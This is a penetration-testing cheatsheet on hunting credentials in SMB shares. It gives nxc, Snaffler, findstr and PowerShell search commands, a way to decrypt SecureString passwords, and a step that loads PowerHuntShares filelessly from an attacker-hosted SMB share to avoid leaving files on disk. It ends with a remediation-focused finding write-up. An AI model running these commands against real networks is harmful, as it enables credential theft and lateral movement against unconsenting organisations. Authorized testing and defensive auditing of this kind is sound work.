π‘οΈ Methodology Checklist
- List accessible shares:
nxc smb [TARGET] -u [USER] -p [PASS] --shares - Spider shares for sensitive files:
nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus - Access shares manually:
smbclient //[TARGET]/[SHARE] -U [USER] - Search for keywords:
nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus --pattern "password\|cred\|secret" - Snaffler for automated credential hunting:
.\Snaffler.exe -s -o snaffler.txt - Download interesting files for offline review
- Check Sysvol/Netlogon for GPP passwords
π― Operational Context
Use when: SMB access obtained β enumerate all accessible shares for credential files, scripts with hardcoded passwords, and sensitive documents.
Think Dumber First: nxc smb [TARGET] -u [USER] -p [PASS] --shares to list shares, then spider_plus module to enumerate file names across all shares without downloading everything. Look for: .ps1, .bat, .xml, web.config, unattend.xml, id_rsa.
Skip when: Shares are empty or only contain public documents β move on quickly.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
net use Z: \\[TARGET_IP]\[SHARE] /user:[DOMAIN]\[USER] [PASS] | Mount SMB share to drive letter |
findstr /S /I /C:"password" *.txt *.xml *.ini *.config *.bat | Search share contents for βpasswordβ (CMD) |
Get-ChildItem -Recurse -Force | Select-String -Pattern "password" -Context 2 | Search share contents (PowerShell) |
Get-ChildItem -Recurse -Include *.txt,*.ini,*.cfg,*.xml | Select-String -Pattern "passw" | Filter by extension then search (PowerShell) |
Snaffler.exe -s | Auto-enumerate shares and regex-match for credentials |
Snaffler.exe -s -u -i "IT" | Targeted Snaffler scan on specific share name |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw" | Spider share remotely without mounting |
docker run --rm blacklanternsecurity/manspider [TARGET_IP] -c 'passw' -u [USER] -p [PASS] | MANSPIDER β Docker-based share scanner from Linux |
sudo impacket-smbserver share . -smb2support -username test -password test | Host share to load PowerHuntShares without touching disk |
π¬ Deep Dive & Workflow
High-Value Share Targets
| Share Type | Why Valuable |
|---|---|
| IT / SysAdmin | Scripts, config files, SSH keys, backup configs |
| HR / Onboarding | Password lists, initial credentials, identity docs |
| Finance | Excel files with service accounts |
| SYSVOL / NETLOGON | Group Policy scripts, XML with GPP passwords |
| Web root | web.config with DB connection strings |
Keywords and Extensions to Hunt
- Keywords:
passw,user,token,key,secret,cred,initial,config - Extensions:
.ini,.cfg,.env,.xlsx,.ps1,.bat,.xml,.config - Domain name β search the domain name inside files (
INLANEFREIGHT,CORP) - Localization β non-English environments:
Benutzer(German for User),Contrasena(Spanish for Password)
Manual Windows Hunting Workflow
# 1. Mount the share
net use Z: \\[TARGET_IP]\IT /user:corp\[USER] [PASS]
cd /d Z:
# 2. CMD search (fast, native)
findstr /S /I /C:"password" *.txt *.xml *.ini *.config *.bat
# 3. PowerShell search (more powerful)
Get-ChildItem -Recurse -Force | Select-String -Pattern "password" -Context 2Snaffler (Best Automated Tool)
C# tool that enumerates accessible shares and applies regex patterns to file contents:
Snaffler.exe -s # scan everything
Snaffler.exe -s -u -i "IT" # focus on IT sharePowerHuntShares (Fileless Execution)
Import PowerHuntShares from an in-memory SMB share to avoid dropping files on disk:
# Attacker: host the script
sudo impacket-smbserver share . -smb2support -username test -password test
# Target: load and run without writing to disk
$pass = ConvertTo-SecureString 'test' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('test', $pass)
New-PSDrive -Name "P" -PSProvider FileSystem -Root "\\[LHOST]\share" -Credential $cred
Import-Module P:\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Publicπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc spider_plus returns error | Module not available | Use smbclient: smbclient //[TARGET]/[SHARE] -U [USER]%[PASS] -c 'recurse; ls' |
| Large share takes too long to enumerate | Thousands of files | Filter by extension: smbclient ... -c 'recurse; mask *.xml; ls' |
| File download fails mid-transfer | Large file or slow link | Use mget with specific file; or get individual files |
| unattend.xml found but no password | Password already applied and blanked | Check AutoLogon keys in registry via winreg: nxc smb [TARGET] -u [USER] -p [PASS] --regquery 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' |
| Scripts found with encrypted passwords | PowerShell SecureString | Decrypt on Windows: $cred = Import-Clixml cred.xml; $cred.GetNetworkCredential().Password |
π Reporting Trigger
Finding Title: Credentials Discovered in SMB Network Share Files Impact: Plaintext or recoverable credentials in network share files (deployment scripts, config files, Group Policy Preferences) enable immediate privilege escalation and lateral movement without exploitation of any technical vulnerability. Root Cause: IT automation scripts and configuration files stored on network shares with excessive read permissions. No sensitive data classification applied to share content. Recommendation: Remove all credentials from shared scripts. Implement LAPS for local admin passwords. Remove Group Policy Preferences credential storage (MS14-025 remediation). Restrict share permissions to minimum required access.